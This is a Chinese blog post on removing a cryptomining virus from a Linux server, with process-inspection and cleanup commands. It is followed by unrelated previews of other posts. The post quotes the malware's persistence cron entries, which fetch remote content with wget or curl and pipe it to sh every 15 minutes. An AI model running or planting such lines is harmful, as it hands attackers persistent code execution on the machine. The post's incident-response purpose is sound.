記一次 qW3xT 4,解決挖礦病毒。

2022-02-20 15:02:42 字數 2509 閱讀 3348

最近感覺我的伺服器特別卡,開啟資料庫都半天,剛開始以為網咯不好也沒太在意。

利用top命令:

這時候問題出來了,最高cpu占用100%,那我用啥???

根據程序id 一看究竟,ps -ef|grep 程序id   

1.cpu占用最多的前10個程序:

ps auxw|head -1;ps auxw|sort -rn -k3|head -10

2.記憶體消耗最多的前10個程序

ps auxw|head -1;ps auxw|sort -rn -k4|head -10

3.虛擬記憶體使用最多的前10個程序

果斷 kill 掉這些程序,刪除qw3xt.4檔案。

其中有乙個檔案比較難刪除

lsattr -a thisxxs

chattr -i  thisxxs 

這樣就可以刪除了

刪除之後kill掉qw3xt.4該程序,但是一段時間之後,發現該行程又重新啟動,肯定是有守護程序,觀察top命令下的程序,發現乙個可疑的程序,直接kill掉。 

一段時間之後,刪除的檔案重新生成,dds和挖礦的程序又重新執行。此時懷疑是否有計畫任務,此時檢視計畫任務的列表

crontab -l

*/15 * * * * wget -q -o- | sh

原來是它在作祟!刪除計畫任務 crontab -r

於是我又看計畫任務的內容,是否是有東西沒有刪除乾淨。

發現計畫任務在伺服器中建立了幾個檔案,

/var/spool/cron/crontabs/root

/var/spool/cron/root

內容是*/15 * * * * curl -fssl | sh。(與計畫任務相同)

將計畫任務中建立的檔案刪除。

最終,這個挖礦病毒終於刪除完成

反思問題解決了,過段時間再看看程序情況,應該是沒有了,可以說殺的挺徹底了

記一次自己挖的坑

在ubuntu中如果以乙個普通使用者的身份以sudo命令修改了 etc sudoers檔案的所屬人所屬組或者許可權導致sudo命令不能使用,會出現報錯 sudo etc sudoers is owned by uid 1000,should be 0 sudo no valid sudoers so...

記一次BIND ISSUE解決過程

在ibm的大機測試環境下,編輯好的程式已經通過編譯,並且拷貝到了rnd的目錄中。但是用之前能夠正常bind其它db2程式的jcl去做rnd環境下的bind的時候,總是bind錯誤。通過檢視jcl的錯誤資訊,定位到如下的sql錯誤 sqlcode 206 sqlstate 42703 tokens t...

記一次ajax的404解決經歷

前台ajax一直報404,後台方法斷點根本進不去,搞了好久,百思不得其解。引數的console.log和報錯資訊如下 ajax方法如下 ajax manage submitpublicclass datatype json data publicclassid serialize success f...